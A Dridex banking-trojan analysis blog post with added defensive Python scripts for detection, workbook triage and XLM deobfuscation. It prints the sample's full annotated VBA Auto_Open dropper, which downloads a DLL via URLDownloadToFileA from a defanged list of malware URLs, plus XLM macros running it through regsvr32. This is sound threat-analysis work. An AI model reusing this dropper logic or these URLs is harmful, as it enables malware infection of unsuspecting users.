Dridex Malware Analysis

SuheililA
5 min read · Jul 2, 2021
image[1–1]

After reviewing the Center for Internet Security (CIS) report on the top 10 malware of 2020, curiosity led me to analyze Dridex to understand why it ranked first in the CIS report.

Dridex is a banking trojan delivered through malicious macros in Microsoft Office documents, using either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.

image[1–2]

Like typical weaponized Office documents, this document uses social engineering to ask the user to enable macro execution when the file is opened.

After enabling content, nothing visibly changed in the Excel file, but in the background there was a different story.

image[1–3]
image[1–4]

I ran Process Monitor and FakeDns to observe the Excel file's activity:

  1. The Excel.exe process resolved the domain basis.ivpr.org.
  2. The Excel.exe process created a child process: regsvr32.exe -s C:\Users\User\AppData\Local\Temp\uevzwkvm.dll

Each time the file is run, a different domain is resolved and a different DLL name is used.
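The process chain observed above (Excel.exe spawning regsvr32.exe with a DLL under the user's Temp folder) is a good detection opportunity independent of the changing domains and file names. The following added example, which is not the author's tooling, flags that chain in a Process Monitor CSV export. The log lines are constructed and modelled on Procmon's export columns (Time of Day, Process Name, PID, Operation, Path, Result, Detail); it generalises from Excel to the other Office hosts, and the column names are an assumption to adjust if your export differs.

```python
"""Flag Office-spawned regsvr32 loading a DLL from the per-user Temp folder,
the chain seen in Process Monitor above. Added example; not the post's code.
The CSV below is constructed, modelled on Procmon's CSV export."""

import csv
import io
import re

# Office hosts that should not normally spawn regsvr32 (generalised from Excel)
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Procmon puts the child's command line in the Detail column of Process Create
CMDLINE_RE = re.compile(r"Command line:\s*(.*)$", re.IGNORECASE)
# A DLL dropped under AppData\Local\Temp, the location used by this sample
TEMP_DLL_RE = re.compile(r'\\AppData\\Local\\Temp\\[^\s"]+\.dll', re.IGNORECASE)

# Constructed sample export: one malicious chain, two benign rows with regsvr32/cmd
SAMPLE_PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:11.1","EXCEL.EXE","4120","RegOpenKey","HKCU\\Software\\Microsoft\\Office","SUCCESS","Desired Access: Read"
"10:02:12.3","EXCEL.EXE","4120","Process Create","C:\\Windows\\System32\\regsvr32.exe","SUCCESS","PID: 5544, Command line: regsvr32.exe -s C:\\Users\\User\\AppData\\Local\\Temp\\uevzwkvm.dll"
"10:02:12.9","EXCEL.EXE","4120","CreateFile","C:\\Users\\User\\AppData\\Local\\Temp\\uevzwkvm.dll","SUCCESS","Desired Access: Generic Write"
"10:05:40.0","explorer.exe","2212","Process Create","C:\\Windows\\System32\\regsvr32.exe","SUCCESS","PID: 6012, Command line: regsvr32.exe /s C:\\Program Files\\Vendor\\component.dll"
"10:06:01.2","WINWORD.EXE","4788","Process Create","C:\\Windows\\System32\\cmd.exe","SUCCESS","PID: 6100, Command line: cmd.exe /c echo hi"
"""


def find_office_regsvr32_temp_loads(csv_text: str) -> list[dict]:
    """Return one finding per 'Process Create' row in which an Office host
    launches regsvr32 with a DLL path under AppData\\Local\\Temp."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "Process Create":
            continue
        if row["Process Name"].lower() not in OFFICE_HOSTS:
            continue
        m = CMDLINE_RE.search(row["Detail"])
        if not m:
            continue
        cmdline = m.group(1)
        if "regsvr32" not in cmdline.lower():
            continue
        dll = TEMP_DLL_RE.search(cmdline)
        if not dll:
            continue
        findings.append({
            "time": row["Time of Day"],
            "parent": row["Process Name"],
            "parent_pid": row["PID"],
            "child": row["Path"],
            "dll": dll.group(0),
            "cmdline": cmdline,
        })
    return findings


if __name__ == "__main__":
    for hit in find_office_regsvr32_temp_loads(SAMPLE_PROCMON_CSV):
        print(f"{hit['time']} {hit['parent']} (PID {hit['parent_pid']}) "
              f"-> {hit['child']} loading {hit['dll']}")
```

The rule keys on parent/child relationship plus the drop location rather than on the DLL name or the domain, which is what changes from run to run in this sample.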

image[1–5]

To understand how the macro works, I used the Microsoft Visual Basic editor embedded in Excel.

But the project was locked and unviewable, so I used the EvilClippy tool to unlock it.

image[1–6]

Now I could see 3 sheets and the VBA code, whereas before unlocking the project I had seen only one sheet.

image[1–7]

The Visible property offers 3 choices (Visible, Hidden and Very Hidden). Sheet1 was set to Visible, while the other sheets were hidden.
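Sheet visibility is stored as a `state` attribute on each `<sheet>` element in `xl/workbook.xml`, so the hiding trick above can be spotted without opening Excel, together with the other structural signs this post goes on to describe (an embedded `xl/vbaProject.bin`, Excel 4.0 macro sheets, and XLM-looking strings sitting in `xl/sharedStrings.xml`, plain or shifted by one character code). The following added static triage script is not the author's deobfuscation code; the workbook it scans is built in memory with placeholder content, and while the part names and the `state` attribute values are standard OOXML, the list of suspicious fragments is my own assumption.

```python
"""Static triage of an OOXML workbook for hidden / very hidden sheets, an
embedded VBA project, Excel 4.0 macro sheets, and suspicious shared strings
(checked as stored and after undoing a +/-1 character shift).
Added example; the sample workbook below is constructed, not the real file."""

import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"

# Lower-cased fragments tied to the behaviour seen in this sample (assumed list)
SUSPICIOUS = ("regsvr32", "urldownloadtofile", "get.workspace",
              "shellexecute", "cancel.key", "appdata\\local\\temp")


def shift(text: str, n: int) -> str:
    """Shift every character code by n (the sample stores strings shifted by 1)."""
    return "".join(chr(ord(c) + n) if ord(c) + n >= 0 else c for c in text)


def build_sample_workbook() -> bytes:
    """Constructed .xlsm-like archive (NOT the real sample) exercising every check."""
    strings = [
        "Enable content to view this document",   # benign lure text
        shift("GET.WORKSPACE(23)", -1),           # XLM fragment stored shifted by -1
        shift("CANCEL.KEY(TRUE)", +1),            # XLM fragment stored shifted by +1
    ]
    workbook = (f'<workbook xmlns="{NS[1:-1]}"><sheets>'
                '<sheet name="Sheet1" sheetId="1"/>'
                '<sheet name="Sheet2" sheetId="2" state="hidden"/>'
                '<sheet name="Macro1" sheetId="3" state="veryHidden"/>'
                '</sheets></workbook>')
    sst = (f'<sst xmlns="{NS[1:-1]}">'
           + "".join(f"<si><t>{escape(s)}</t></si>" for s in strings)
           + "</sst>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/sharedStrings.xml", sst)
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder")  # OLE magic
        z.writestr("xl/macrosheets/sheet1.xml", "<placeholder/>")
    return buf.getvalue()


def triage_workbook(data: bytes) -> dict:
    """Collect structural and string indicators from the workbook bytes."""
    report = {"hidden_sheets": [], "very_hidden_sheets": [],
              "has_vba_project": False, "has_xlm_macrosheets": False,
              "suspicious_strings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        report["has_vba_project"] = "xl/vbaProject.bin" in names
        report["has_xlm_macrosheets"] = any(n.startswith("xl/macrosheets/") for n in names)
        if "xl/workbook.xml" in names:
            for sheet in ET.fromstring(z.read("xl/workbook.xml")).iter(NS + "sheet"):
                state = sheet.get("state", "visible")
                if state == "hidden":
                    report["hidden_sheets"].append(sheet.get("name"))
                elif state == "veryHidden":
                    report["very_hidden_sheets"].append(sheet.get("name"))
        if "xl/sharedStrings.xml" in names:
            for t in ET.fromstring(z.read("xl/sharedStrings.xml")).iter(NS + "t"):
                text = t.text or ""
                # Try the string as stored, then after undoing a -1 or +1 shift
                for n in (0, 1, -1):
                    hits = [s for s in SUSPICIOUS if s in shift(text, n).lower()]
                    if hits:
                        report["suspicious_strings"].append(
                            {"stored": text, "shift": n, "hits": hits})
                        break
    return report


def verdict(report: dict) -> list[str]:
    """Human-readable reasons the file deserves a closer look."""
    reasons = []
    if report["very_hidden_sheets"]:
        reasons.append("very hidden sheet(s): " + ", ".join(report["very_hidden_sheets"]))
    if report["has_vba_project"]:
        reasons.append("VBA project present (xl/vbaProject.bin)")
    if report["has_xlm_macrosheets"]:
        reasons.append("Excel 4.0 macro sheet(s) present")
    if report["suspicious_strings"]:
        reasons.append(f"{len(report['suspicious_strings'])} suspicious shared string(s)")
    return reasons


if __name__ == "__main__":
    for reason in verdict(triage_workbook(build_sample_workbook())):
        print("-", reason)
```

Pass the bytes of a real .xlsm to `triage_workbook` instead of the constructed sample; a Very Hidden sheet cannot be unhidden from Excel's UI, so its presence alone is worth a look.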

VBA MACRO Module1.bas
in file: xl/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' URLDownloadToFileA imported under a misleading alias; it fetches the DLL later on
#If VBA7 And Win64 Then
Private Declare PtrSafe Function X_resize_Page1 Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function X_resize_Page1 Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If

' Concatenates the decoded contents of sheet 4 (shift -1) and sheet 3 (shift +1)
Function mixcols()
mixcols = g_r_book(4, 4) & g_r_book(3, 55)
End Function

' Decoder: takes the last constant cell of sheet s and shifts every character code by +1 (j > 5) or -1
Function g_r_book(s, j As Integer)
If j > 5 Then jj = 1 Else jj = -1
For Each u In Sheets(s).UsedRange.SpecialCells(xlCellTypeConstants): m = u: Next
v1 = Split(StrConv(m, 64), Chr(0)): For Each vv1 In v1: On Error Resume Next: k = k & Chr(Asc(vv1) + jj): Next: g_r_book = k
End Function

' Always returns 2
Function valPrices()
valPrices = 5-3
End Function

' Separator selector: "]" when called with 2, "$" otherwise
Function restDue(yel As Integer)
restDue = "$"
If yel = 2 Then restDue = "]"
End Function

' Entry point: runs automatically once macros are enabled
Sub Auto_Open()
Dim O As Integer: Dim Oa As Integer: ol = 1
' Name cell A2 "This_len" so its formula can be executed with Run, then decode the hidden strings
Sheets(ol).Cells(valPrices, ol).Name = ds_po3 & "len": govs = mixcols
' kij(0) holds the "$"-separated download links, kij(1) the "]"-separated XLM formulas
Oa = 9: kij = Split(govs, "="): x_p_cl = Split(kij(ol), restDue(valPrices)): aa = 2
For a = 1 To UBound(x_p_cl) - LBound(x_p_cl) + 1
On Error Resume Next
' Write each XLM formula into A2 and execute it
Sheets(ol).Cells(aa, ol).value = "=" & x_p_cl(a): Run (ds_po3 & "len")
' The 13th and 15th formulas (SET.VALUE(B2,bb) and SET.VALUE(B2,ab) in the XLM list below) leave the Temp path and the random DLL name in column B
If a = 13 Then directoo = P_new_price
If a = 15 Then
fillename = P_new_price
' Download one randomly chosen link to <Temp dir>\<random name>.dll
X_resize_Page1 0, a_timers(Split(kij(0), restDue(Oa))), directoo & "\" & fillename, 0, 0
End If
Next
' Clear the cells that were used as scratch space
kj = 8: Sheets(ol).Range("A1:B6").Clear
End Sub

Function ds_po3()
ds_po3 = "This_"
End Function

' Returns a random element of the array (used to pick a download link)
Function a_timers(nimo As Variant) As String
Randomize: df = 2-1: a_timers = nimo(Int((UBound(nimo) + df) * Rnd))
End Function

' Reads the constant cells in B1:B5 of sheet 1, where the XLM SET.VALUE calls wrote their results
Function P_new_price()
P_new_price = Sheets(1).Range("B1:B5").SpecialCells(xlCellTypeConstants)
End Function

I wrote Python code to deobfuscate the strings embedded in sharedStrings.xml. The result splits into two parts, links and XLM (Excel 4.0) macros:

Links:

http://trezors[.]io[.]mahlongwa[.]com/rexj53wq[.]zip
http://wiki[.]deveyesgroup[.]com/zbd2ng4j[.]zip
http://cpanel[.]takeorders[.]co[.]uk/kzwc4s[.]zip
http://nlmcvt[.]blissgene[.]com/grh5fw[.]rar
http://t4p[.]autors[.]pt/hk1sqc[.]rar
http://oasis[.]ivpr[.]org/kek4cz[.]zip
http://app-halifax-mobileverification-mobileappupdate-system-update[.]cgsconstructores[.]com/abwtwv3x[.]zip
http://peau2[.]ivpr[.]org/sgo2vq0[.]zip
http://challengebarbell[.]co[.]in/vy6evt[.]zip
http://ebay[.]vehicle[.]sales[.]aketbd[.]com/ssvklay[.]rar
http://urbantrapfest[.]cl/byd2p9[.]zip
http://4evakleen[.]com[.]au/mq722o00t[.]rar
http://junzhang[.]webme[.]us/wiwl81d[.]zip
http://web[.]guatemayavirtual[.]com/yqqu2ex[.]zip
http://40fortyfoods[.]com/dwujyxoyd[.]rar
http://qdtoolkit[.]thelaeffect[.]com/cm96j9axl[.]zip
http://mail[.]qcvmail[.]com/k5fhmlr[.]zip
http://miloscolic[.]bplaced[.]net/bsanc5ak[.]zip
http://dentart[.]elitemarketing[.]hu/upeb9y2m[.]rar
http://sellitzer[.]perkss[.]co[.]uk/spqo38ic[.]zip
http://franchising[.]phone-recovery[.]it/ya75s29h[.]zip
http://noblesteel[.]com[.]au/eev8fmc[.]rar
http://jaalifestyle[.]my[.]id/z90r05[.]rar
http://agritork[.]com[.]tr/er7itgi[.]rar
http://demo[.]opacokitchens[.]com/dq9b7u[.]zip
http://scrap[.]nepalesehost[.]com/bde07cx[.]zip
http://messagesecureapp[.]duckdns[.]org/qh528ype[.]zip
http://marlenesbrothel[.]com[.]au/jcp05s[.]zip
http://plajart[.]com/gj1qlwo[.]rar
http://0007[.]name/t7kw7bb[.]zip
http://thnconsult[.]com/dbmbyhh[.]rar
http://ofice[.]seriesnow[.]website/qbeda328[.]rar
http://shadowsecinjector[.]cf/pymp0wkh[.]zip
http://staging[.]lincmagazine[.]deveyesgroup[.]com/duruhbp6[.]zip
http://taoyonghao[.]webme[.]us/szuadd[.]rar
http://messagesecurepaypal[.]duckdns[.]org/jf8s8z[.]rar
http://queensradiationtherapy[.]com/dbaobi[.]zip
http://valeriaromero[.]com/gsb509kb[.]rar
http://controlcenter[.]mystand[.]pt/lzvngo469[.]rar
http://vanzare[.]cabanabrazi2[.]ro/od14p7v[.]rar
http://sanelcorp[.]com/zo8me9g[.]rar
http://bigcomics[.]cf/zklovc4vb[.]rar
http://misturafinapizzaria[.]com[.]br/ex4k9x[.]zip
http://str[.]shoppclick[.]com/hasb2l[.]zip
http://download[.]nepalesehost[.]com/wyvnrv0z[.]rar
http://picinfor[.]com/nbwqh6n0[.]zip
http://vienen[.]gblix[.]srv[.]br/fdwzkmx[.]rar
http://lanjar[.]seriesnow[.]website/x16t6gr7[.]zip
http://ozdomb[.]elitemarketing[.]hu/xax7k4mlp[.]zip
http://amirartstudio[.]com/oc87ak5[.]rar
http://areins[.]org/dkwjfvif[.]zip
http://liquidglovehandsanitizer[.]com/fjkfv3s[.]zip
http://tokajkonferencia[.]elitemarketing[.]hu/bmaxb7d[.]zip
http://tit[.]elitemarketing[.]hu/j0wq82a[.]zip
http://freightnet[.]drapac[.]com/lss2lh[.]zip
http://down[.]seriesnow[.]website/k92u9vb[.]rar
https://atamakultura[.]com/sdq3lsdzp[.]zip
http://teneth[.]co[.]za/lev5e9[.]rar
https://mertlog[.]com/o3ef15[.]rar
https://smsh[.]care/k1xjwsax[.]zip
http://imbueautoworx[.]co[.]za/jpfnnl2g[.]zip
https://royallogistic[.]info/sj5a1ajw[.]rar
http://itake1[.]com/ihrlkispj[.]zip
https://huevacations[.]com/ot0g7ot[.]zip
https://uisusa[.]uisusa[.]com/fmqmmw[.]zip
https://www[.]networkaruba[.]com/k9kl6e[.]rar
https://immigration[.]omsms[.]in/lin58hwsh[.]zip
https://supergrafperu[.]com/aeknas[.]rar
http://2015[.]grupokeithmar[.]com/bhn10bigh[.]rar
http://isiphephelocon[.]co[.]za/h33pky[.]rar
https://arm[.]backyardproject[.]net/bdu3uazp[.]zip
https://rajibpalit[.]ifunnelspro[.]com/megv9bls6[.]zip
http://f1sol[.]com/ibnt6ia[.]rar
https://gonzalezsirit[.]techsavvyway[.]com/t39cqvcu[.]rar
https://afautomotores[.]com[.]py/nzr55o[.]zip
https://torresquinterocorp[.]com/w50lew[.]zip
http://funamituristico[.]org/ivt9yh12[.]rar
https://app[.]mirrorlabelsindia[.]com/zlmfkl[.]rar
http://fakihlaw[.]atwebpages[.]com/rybt1i[.]rar
https://demo[.]omsms[.]in/iri3np7[.]rar

XLM (Excel 4.0) macros:

SET.NAME("b0b",CHAR(101))
SET.NAME("i0","J")
SET.NAME("w000","\")
IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))),`y112G`,CLOSE(FALSE))
SET.NAME("o0","32")
CANCEL.KEY(TRUE)
SET.NAME("w00",b0b)
CANCEL.KEY(TRUE)
SET.NAME("v0","O")
SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00)
SET.NAME("wegb","Sh"&w00&"ll")
SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w000&"T"&b0b&"mp"&w000)
SET.VALUE(B2,bb)
SET.NAME("ab",LEFT(CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97)&CHAR(RAND()*26+97),RAND()*8+5)&".dll")
SET.VALUE(B2,ab)
CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0,"`y112G`-s`y112G`"&bb&ab,0,0)

//Call(Shell32,ShellExecuteA,JJCCCCJ,0,Open,regsvr32,"`y112G`-s`y112G`"C:\Users\[User]\AppData\Local\Temp\[xxx].dll,0,0)
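The annotated Call() line above is what you get once every SET.NAME indirection is substituted back. That substitution can be done mechanically: walk the macro lines in order, evaluate each SET.NAME whose value is built only from string literals, CHAR(n), earlier names and "&" concatenation, and leave anything that depends on runtime state (GET.WORKSPACE, RAND, LEFT/FIND) as written. The following is an added example, not the author's script; the macro lines are copied from the list above with the `y112G` markers replaced by plain spaces, which is my assumption about what the author's decoder had substituted.

```python
"""Resolve SET.NAME indirection in Excel 4.0 macro lines to reveal the final
CALL() arguments. Added example; not the post's own code. Only literals,
CHAR(n), known names and '&' are evaluated; runtime-dependent terms stay raw."""

import re

SET_NAME = re.compile(r'^SET\.NAME\("([^"]+)",(.*)\)$')
CHAR_N = re.compile(r'^CHAR\((\d+)\)$')
IDENT = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')

# Lines from the post, with the `y112G` markers replaced by spaces (assumption)
SAMPLE_XLM = [
    'SET.NAME("b0b",CHAR(101))',
    'SET.NAME("i0","J")',
    'SET.NAME("w000","\\")',
    'SET.NAME("o0","32")',
    'CANCEL.KEY(TRUE)',
    'SET.NAME("w00",b0b)',
    'SET.NAME("v0","O")',
    'SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00)',
    'SET.NAME("wegb","Sh"&w00&"ll")',
    'SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))'
    '&"Local"&w000&"T"&b0b&"mp"&w000)',
    'CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n",'
    '"r"&w00&"gsvr"&o0," -s "&bb&ab,0,0)',
]


def split_top_level(text: str, sep: str) -> list[str]:
    """Split on sep only outside double quotes and outside parentheses."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur))
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def eval_term(term: str, names: dict):
    """Static value of one '&' operand, or None if it is not statically known."""
    term = term.strip()
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1]
    m = CHAR_N.match(term)
    if m:
        return chr(int(m.group(1)))
    if IDENT.match(term) and term in names:
        return names[term]
    return None


def eval_expr(expr: str, names: dict):
    """Evaluate a '&' concatenation; None if any operand is unknown."""
    values = [eval_term(t, names) for t in split_top_level(expr, "&")]
    return None if any(v is None for v in values) else "".join(values)


def render_arg(arg: str, names: dict) -> str:
    """Show a CALL argument with every statically known operand substituted."""
    terms = split_top_level(arg, "&")
    values = [eval_term(t, names) for t in terms]
    if all(v is not None for v in values):
        return '"' + "".join(values) + '"'
    return "&".join(f'"{v}"' if v is not None else t.strip()
                    for v, t in zip(values, terms))


def resolve(lines: list[str]):
    """Return (resolved names, list of CALL lines with names substituted)."""
    names, calls = {}, []
    for line in lines:
        m = SET_NAME.match(line)
        if m:
            value = eval_expr(m.group(2), names)
            if value is not None:
                names[m.group(1)] = value
        elif line.startswith("CALL(") and line.endswith(")"):
            args = split_top_level(line[len("CALL("):-1], ",")
            calls.append("CALL(" + ",".join(render_arg(a, names) for a in args) + ")")
    return names, calls


if __name__ == "__main__":
    resolved, call_lines = resolve(SAMPLE_XLM)
    for name, value in resolved.items():
        print(f"{name} = {value!r}")
    for c in call_lines:
        print(c)
```

The names `bb` and `ab` stay unresolved because they come from GET.WORKSPACE and RAND at run time, which is exactly why the DLL name and path differ on every run; the library, export and verb arguments, on the other hand, are fully static and therefore good material for a detection signature.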

After decoding the strings, the VBA code randomly chooses one of the links to download the malicious .dll, then executes the CALL() function from the XLM macros to run the malicious DLL.

Summary: Now we have good visibility into one of the top 10 malware families of 2020. The links can be used as IOCs to check your environment and to block (not all engines detected all of the links).

Part 2 of the analysis will cover the .dll file and its purpose. [coming soon]

Reference:

  1. https://www.cisecurity.org/blog/top-10-malware-march-2020/
  2. https://us-cert.cisa.gov/ncas/alerts/aa19-339a
  3. https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/
